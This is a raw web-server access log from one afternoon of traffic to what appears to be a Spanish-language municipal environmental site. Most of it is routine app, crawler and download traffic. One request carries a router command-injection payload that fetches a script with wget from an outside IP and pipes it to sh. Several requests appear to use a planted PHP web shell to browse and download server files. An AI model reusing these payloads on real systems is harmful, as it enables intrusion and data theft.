161.18.222.72 - - [16/Jun/2024:13:12:44 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:12:44 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:12:44 -0500] "GET /sipse/faces/javax.faces.resource/fileupload/fileupload.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:12:44 -0500] "GET /sipse/faces/javax.faces.resource/fileupload/fileupload.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:12:44 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
47.128.98.84 - - [16/Jun/2024:13:12:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2000%5C&f=1956.pdf&ft=notepad&white=1 HTTP/1.1" 200 46432
161.18.222.72 - - [16/Jun/2024:13:12:55 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:12:55 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:12:55 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:12:55 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:12:55 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:12:55 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:12:55 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:12:54 -0500] "POST /sipse/faces/presentacion/sistema/anexos/cargarAnexoSolicitudProceso.xhtml HTTP/1.1" 200 160425
161.18.222.72 - - [16/Jun/2024:13:12:55 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:12:55 -0500] "GET /sipse/faces/javax.faces.resource/dynamiccontent.properties?ln=primefaces&pfdrid=XjOR5%2F%2FfPAZAuY9TpWQeCiM0BhlXxYRBGKi%2FQcXXfeA%3D&pfdrid_c=false HTTP/1.1" 500 383
161.18.222.72 - - [16/Jun/2024:13:13:01 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 19424
161.18.222.72 - - [16/Jun/2024:13:13:01 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:13:01 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:13:01 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:13:01 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:13:01 -0500] "GET /sipse/faces/javax.faces.resource/fileupload/fileupload.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:13:01 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:13:01 -0500] "GET /sipse/faces/javax.faces.resource/fileupload/fileupload.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:13:01 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:13:01 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:13:01 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:13:06 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:13:06 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:13:06 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:13:06 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:13:06 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:13:06 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:13:06 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:13:07 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:13:05 -0500] "POST /sipse/faces/presentacion/sistema/anexos/cargarAnexoSolicitudProceso.xhtml HTTP/1.1" 200 162878
161.18.222.72 - - [16/Jun/2024:13:13:07 -0500] "GET /sipse/faces/javax.faces.resource/dynamiccontent.properties?ln=primefaces&pfdrid=XjOR5%2F%2FfPAZAuY9TpWQeCiM0BhlXxYRBGKi%2FQcXXfeA%3D&pfdrid_c=false HTTP/1.1" 500 383
201.245.192.253 - - [16/Jun/2024:13:13:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [16/Jun/2024:13:13:27 -0500] "HEAD / HTTP/1.1" 200 -
161.18.222.72 - - [16/Jun/2024:13:13:32 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:13:32 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:13:32 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:13:32 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:13:32 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:13:32 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:13:32 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:13:32 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:13:32 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 163408
161.18.222.72 - - [16/Jun/2024:13:13:33 -0500] "GET /sipse/faces/javax.faces.resource/dynamiccontent.properties?ln=primefaces&pfdrid=XjOR5%2F%2FfPAZAuY9TpWQeCiM0BhlXxYRBGKi%2FQcXXfeA%3D&pfdrid_c=false HTTP/1.1" 500 383
168.119.253.69 - - [16/Jun/2024:13:13:46 -0500] "GET / HTTP/1.1" 200 4720
161.18.222.72 - - [16/Jun/2024:13:14:02 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:14:02 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 31843
161.18.222.72 - - [16/Jun/2024:13:14:05 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:14:05 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:14:05 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:14:05 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:14:05 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:14:05 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1376
172.22.2.4 - - [16/Jun/2024:13:12:41 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2024:13:14:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [16/Jun/2024:13:13:32 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
201.245.192.253 - - [16/Jun/2024:13:15:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:13:16:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:13:16:44 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
201.245.192.253 - - [16/Jun/2024:13:16:56 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35726
47.128.97.177 - - [16/Jun/2024:13:16:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-includes%5C&f=bookmark-template.php&ft=download&white=1 HTTP/1.1" 200 11497
201.245.192.253 - - [16/Jun/2024:13:16:57 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34563
201.245.192.253 - - [16/Jun/2024:13:17:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [16/Jun/2024:13:18:20 -0500] "GET /BLA/resoluciones/AUTOS%202016/3033.pdf HTTP/1.1" 200 350847
201.245.192.253 - - [16/Jun/2024:13:18:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [16/Jun/2024:13:18:27 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [16/Jun/2024:13:18:29 -0500] "GET /BLA/resoluciones/AUTOS%202016/0011.pdf HTTP/1.1" 200 462740
216.244.66.195 - - [16/Jun/2024:13:18:52 -0500] "GET /BLA/resoluciones/AUTOS%202016/0036.pdf HTTP/1.1" 200 458471
185.191.127.212 - - [16/Jun/2024:13:18:54 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.28.141%2Ft+-O-+|+sh%60) HTTP/1.1" 404 1018
201.245.192.253 - - [16/Jun/2024:13:18:54 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34566
216.244.66.195 - - [16/Jun/2024:13:19:11 -0500] "GET /galeria/galeria/fotos/diaSC11.jpg HTTP/1.1" 200 150678
201.245.192.253 - - [16/Jun/2024:13:19:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:13:19:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34563
199.16.157.180 - - [16/Jun/2024:13:19:45 -0500] "GET /en-semana-santa-realice-sus-tramites-ante-la-secretaria-de-ambiente-de-forma-virtual.html HTTP/1.1" 200 835
199.16.157.181 - - [16/Jun/2024:13:19:45 -0500] "GET /images/atencion-al-ciudadano-abril.jpg HTTP/1.1" 200 116523
172.22.2.4 - - [16/Jun/2024:13:18:31 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2024:13:20:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.21 - - [16/Jun/2024:13:20:29 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202022/5457.pdf HTTP/1.1" 304 -
216.244.66.195 - - [16/Jun/2024:13:20:44 -0500] "GET /BLA/resoluciones/AUTOS%202010/0380.pdf HTTP/1.1" 200 181051
135.148.32.149 - - [16/Jun/2024:13:21:00 -0500] "GET /isolucionsda/BancoConocimiento/I/IdearioEtico_v1/IdearioEtico_v1.asp HTTP/1.1" 404 4948
216.244.66.195 - - [16/Jun/2024:13:21:01 -0500] "GET /BLA/resoluciones/AUTOS%202010/0843.pdf HTTP/1.1" 200 398014
172.22.2.4 - - [16/Jun/2024:13:19:22 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 45104
47.128.38.239 - - [16/Jun/2024:13:21:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CMercuryMail&f=welcome.dmi&ft=download HTTP/1.1" 200 35243
216.244.66.195 - - [16/Jun/2024:13:21:17 -0500] "GET /BLA/resoluciones/AUTOS%202010/1271.pdf HTTP/1.1" 200 425425
172.22.2.4 - - [16/Jun/2024:13:19:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 45104
201.245.192.253 - - [16/Jun/2024:13:21:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [16/Jun/2024:13:21:26 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [16/Jun/2024:13:21:00 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
201.245.192.253 - - [16/Jun/2024:13:21:43 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
216.244.66.195 - - [16/Jun/2024:13:21:48 -0500] "GET /BLA/resoluciones/AUTOS%202010/2355.pdf HTTP/1.1" 200 314370
216.244.66.195 - - [16/Jun/2024:13:22:14 -0500] "GET /BLA/resoluciones/AUTOS%202010/2512.pdf HTTP/1.1" 200 176575
201.245.192.253 - - [16/Jun/2024:13:22:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [16/Jun/2024:13:22:38 -0500] "GET /BLA/resoluciones/AUTOS%202010/2885.pdf HTTP/1.1" 200 209312
216.244.66.195 - - [16/Jun/2024:13:23:01 -0500] "GET /BLA/resoluciones/AUTOS%202010/3574.pdf HTTP/1.1" 200 156685
216.244.66.195 - - [16/Jun/2024:13:23:22 -0500] "GET /BLA/resoluciones/AUTOS%202010/4271.pdf HTTP/1.1" 200 238597
201.245.192.253 - - [16/Jun/2024:13:23:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [16/Jun/2024:13:23:27 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [16/Jun/2024:13:23:45 -0500] "GET /BLA/resoluciones/AUTOS%202010/4424.pdf HTTP/1.1" 200 142755
168.119.100.88 - - [16/Jun/2024:13:24:00 -0500] "GET / HTTP/1.1" 200 4720
216.244.66.195 - - [16/Jun/2024:13:24:05 -0500] "GET /BLA/resoluciones/AUTOS%202010/4667.pdf HTTP/1.1" 200 322859
201.245.192.253 - - [16/Jun/2024:13:24:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [16/Jun/2024:13:24:25 -0500] "GET /BLA/resoluciones/AUTOS%202010/5443.pdf HTTP/1.1" 200 1825795
74.125.210.198 - - [16/Jun/2024:13:24:29 -0500] "GET /galeria/galeria/fotos/Soratama1G.jpg HTTP/1.1" 200 127762
216.244.66.195 - - [16/Jun/2024:13:24:54 -0500] "GET /BLA/resoluciones/AUTOS%202010/5575.pdf HTTP/1.1" 200 922749
47.128.27.83 - - [16/Jun/2024:13:25:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Csig%5CGesti%F3n+Ambiental&f=126PM03-PR27.pdf&ft=download HTTP/1.1" 200 198326
216.244.66.195 - - [16/Jun/2024:13:25:18 -0500] "GET /BLA/resoluciones/AUTOS%202010/5658.pdf HTTP/1.1" 200 630389
201.245.192.253 - - [16/Jun/2024:13:25:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [16/Jun/2024:13:25:41 -0500] "GET /BLA/resoluciones/AUTOS%202010/6231.pdf HTTP/1.1" 200 1970407
78.94.254.26 - - [16/Jun/2024:13:25:41 -0500] "GET /IsolucionSDA/Scripts/jsUtilities.js HTTP/1.1" 200 136227
161.18.222.72 - - [16/Jun/2024:13:25:43 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 911
161.18.222.72 - - [16/Jun/2024:13:25:45 -0500] "GET /sipse/faces/presentacion/financiero/solicitudProceso/faces/autenticacion HTTP/1.1" 302 -
161.18.222.72 - - [16/Jun/2024:13:25:45 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12411
161.18.222.72 - - [16/Jun/2024:13:25:45 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:25:45 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:25:45 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:25:45 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:25:45 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:25:45 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:25:45 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:25:46 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:25:58 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 11434
161.18.222.72 - - [16/Jun/2024:13:25:58 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:25:58 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:25:58 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:25:58 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:25:59 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
172.22.2.4 - - [16/Jun/2024:13:24:21 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
161.18.222.72 - - [16/Jun/2024:13:26:04 -0500] "POST /sipse/faces/presentacion/sistema/seguridad/seleccionRol.xhtml HTTP/1.1" 200 5801
161.18.222.72 - - [16/Jun/2024:13:26:04 -0500] "POST /sipse/faces/presentacion/sistema/seguridad/seleccionRol.xhtml HTTP/1.1" 200 16458
161.18.222.72 - - [16/Jun/2024:13:26:04 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:26:04 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:26:04 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:26:04 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
216.244.66.195 - - [16/Jun/2024:13:26:06 -0500] "GET /BLA/resoluciones/AUTOS%202010/6814.pdf HTTP/1.1" 200 135485
199.16.157.180 - - [16/Jun/2024:13:26:14 -0500] "GET /images/fauna%20sda2.jpeg HTTP/1.1" 200 122749
161.18.222.72 - - [16/Jun/2024:13:26:18 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:26:18 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 1471
161.18.222.72 - - [16/Jun/2024:13:26:19 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 1473
161.18.222.72 - - [16/Jun/2024:13:26:21 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 63600
161.18.222.72 - - [16/Jun/2024:13:26:22 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:26:22 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:26:22 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:26:22 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [16/Jun/2024:13:26:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
161.18.222.72 - - [16/Jun/2024:13:26:22 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1556
161.18.222.72 - - [16/Jun/2024:13:26:25 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 33342
216.244.66.195 - - [16/Jun/2024:13:26:26 -0500] "GET /BLA/resoluciones/AUTOS%202010/6950.pdf HTTP/1.1" 200 378127
161.18.222.72 - - [16/Jun/2024:13:26:29 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 33372
34.86.177.154 - - [16/Jun/2024:13:26:33 -0500] "GET /robots.txt HTTP/1.1" 404 1034
34.86.177.154 - - [16/Jun/2024:13:26:33 -0500] "GET /distrito-firma-acuerdos-de-conservacion-con-academia-y-sociedad-civil-para-proteger-22-hectareas-en-suba-y-cerros-orientales.html HTTP/1.1" 200 1062
66.249.66.20 - - [16/Jun/2024:13:26:33 -0500] "GET /bla/boletinlegal/Directivas/2014/Directiva%20No.%202%20del%205%20de%20Mayo%20de%202014.pdf HTTP/1.1" 200 591315
66.249.66.37 - - [16/Jun/2024:13:26:33 -0500] "GET / HTTP/1.1" 200 4720
66.249.66.21 - - [16/Jun/2024:13:26:34 -0500] "GET /BLA/resoluciones/AUTOS%202023/5959.pdf HTTP/1.1" 200 409780
66.249.66.19 - - [16/Jun/2024:13:26:34 -0500] "GET /BLA/resoluciones/AUTOS%202023/3414.pdf HTTP/1.1" 200 394994
66.249.66.20 - - [16/Jun/2024:13:26:35 -0500] "GET /BLA/resoluciones/AUTOS%202023/2259.pdf HTTP/1.1" 200 432412
66.249.66.21 - - [16/Jun/2024:13:26:35 -0500] "GET /bla/boletinlegal/Circulares/2020/CIRCULAR%20No.%2000019%20DEL%2018%20DE%20DICIEMBRE%20DEL%202020.pdf HTTP/1.1" 200 307959
161.18.222.72 - - [16/Jun/2024:13:26:36 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 6079
161.18.222.72 - - [16/Jun/2024:13:26:37 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 121973
161.18.222.72 - - [16/Jun/2024:13:26:38 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:26:38 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:26:38 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:26:38 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:26:38 -0500] "GET /sipse/faces/javax.faces.resource/dynamiccontent.properties?ln=primefaces&pfdrid=XjOR5%2F%2FfPAZAuY9TpWQeCiM0BhlXxYRBGKi%2FQcXXfeA%3D&pfdrid_c=false HTTP/1.1" 500 383
52.167.144.166 - - [16/Jun/2024:13:26:40 -0500] "GET /BLA/resoluciones/AUTOS%202017/0239.pdf HTTP/1.1" 200 343318
201.245.192.253 - - [16/Jun/2024:13:26:42 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
216.244.66.195 - - [16/Jun/2024:13:26:46 -0500] "GET /BLA/resoluciones/AUTOS%202011/3901.pdf HTTP/1.1" 200 152310
161.18.222.72 - - [16/Jun/2024:13:26:48 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 157796
172.22.2.4 - - [16/Jun/2024:13:25:12 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
201.245.192.253 - - [16/Jun/2024:13:26:56 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35726
201.245.192.253 - - [16/Jun/2024:13:26:57 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34563
216.244.66.195 - - [16/Jun/2024:13:27:04 -0500] "GET /BLA/resoluciones/AUTOS%202011/4017.pdf HTTP/1.1" 200 330794
161.18.222.72 - - [16/Jun/2024:13:27:04 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 377782
161.18.222.72 - - [16/Jun/2024:13:27:15 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 157796
216.244.66.195 - - [16/Jun/2024:13:27:22 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0424.pdf HTTP/1.1" 200 990104
201.245.192.253 - - [16/Jun/2024:13:27:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
161.18.222.72 - - [16/Jun/2024:13:27:29 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 41366
161.18.222.72 - - [16/Jun/2024:13:27:29 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
